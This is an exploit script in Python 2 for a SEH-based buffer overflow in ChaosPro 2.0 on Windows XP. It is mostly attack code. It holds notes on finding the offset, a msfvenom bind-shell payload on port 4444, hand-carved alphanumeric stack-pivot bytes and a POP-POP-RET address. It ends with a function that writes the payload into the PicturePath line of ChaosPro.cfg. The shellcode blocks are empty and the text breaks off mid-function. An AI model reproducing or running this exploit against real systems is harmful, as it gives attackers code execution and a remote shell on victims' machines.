# Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH)  
# Date: 2019-10-27  
# Exploit Author: Chase Hatch (SYANiDE)  
# Vendor Homepage:  
# Software link:  
# Version: 2.0  
# Tested on: Windows XP Pro OEM  
#!/usr/bin/env python2  
import os, sys  
# sploit = "A"* 5000 ## Crash! 41414141 in SEH! via ProfilePath or PicturePath. Windows XP OEM  
# `locate pattern_create.rb | head -n 1` 5000 # 326d4431  
# `locate pattern_offset.rb | head -n 1` 326d4431 5000 # 2705  
# sploit = "A" * (2705 - 4 - 126) # 2575  
# sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE  
# `locate pattern_offset.rb|head -n 1` 61413561 2575  
# 16  
################ Second stage ####################  
sploit = "A"*16  
# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh   
#, BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c  
sploit += (  
) # 710 bytes  
sploit += "A" * (2575 - 16 - 710)  
################ First stage ####################  
# ESP: 0012E75C  
# ESP target: 0012FF98  
## Need to align to four-byte and 16-byte boundaries:  
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc  
# 282.0000  
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc  
# 1551.0000  
# echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc  
# 183C  
# 0012FF32 54 PUSH ESP  
# 0012FF33 58 POP EAX  
# 0012FF34 66:05 3C18 ADD AX,183C  
# 0012FF38 50 PUSH EAX  
# 0012FF39 5C POP ESP  
sploit += "\x54\x58\x66\x05\x3c\x18\x50\x5c" # 8  
# target instruction to push onto stack at new ESP: FFE4 JMP ESP # 4141E4FF  
# ./ 4141E4FF 0 7f7f017f 0101017f 3e3e1803  
# 0:25 28 28 28 28 and eax,0x28282828  
# 5:25 47 47 47 47 and eax,0x47474747  
# a:2d 7f 01 7f 7f sub eax,0x7f7f017f  
# f:2d 7f 01 01 01 sub eax,0x101017f  
# 14:2d 03 18 3e 3e sub eax,0x3e3e1803  
# 19:50 push eax  
sploit += (  
) # 26 bytes  
## Realign new ESP with beginning of overflow buffer:  
## New ESP should be four-byte and 16-byte aligned:  
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc  
# 122.0000  
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc  
# 671.0000  
# echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc  
# A7C  
## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean)  
# 0012FF54 44 INC ESP  
# 0012FF55 44 INC ESP  
# 0012FF56 44 INC ESP  
# 0012FF57 44 INC ESP  
# 0012FF58 44 INC ESP  
# 0012FF59 44 INC ESP  
# 0012FF5A 44 INC ESP  
# 0012FF5B 44 INC ESP  
sploit += "\x44\x44\x44\x44\x44\x44\x44\x44" # 8  
## Going to have to carve out the address 0012F51C  
# ./ 0012F51C 0 7f7f017f 61010101 1f6d0864  
# 0:25 02 02 02 02 and eax,0x2020202  
# 5:25 51 51 51 51 and eax,0x51515151  
# a:2d 7f 01 7f 7f sub eax,0x7f7f017f  
# f:2d 01 01 01 61 sub eax,0x61010101  
# 14:2d 64 08 6d 1f sub eax,0x1f6d0864  
# 19:50 push eax  
sploit +=(  
) # 26 bytes  
## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP  
# 5C POP ESP  
sploit += "\x5c" # 1  
sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1)  
################ RET from SEH: JMP SHORT - 126 ####################  
sploit += "\xeb\x80" + "\x41\x41" # 4  
# 00401B44 |. 5F POP EDI  
# 00401B45 |> 5E POP ESI  
# 00401B46 \. C3 RETN  
sploit += "\x44\x1b\x40\x00"  
################ build the config ####################  
## Running from just outside base directory of ChaosPro:  
def ret_cfg(inp):  
# do it live in PicturePath  
cfg = """PicturePath %s""" % inp  
with open("chaospro\\ChaosPro.cfg",'w') as F:  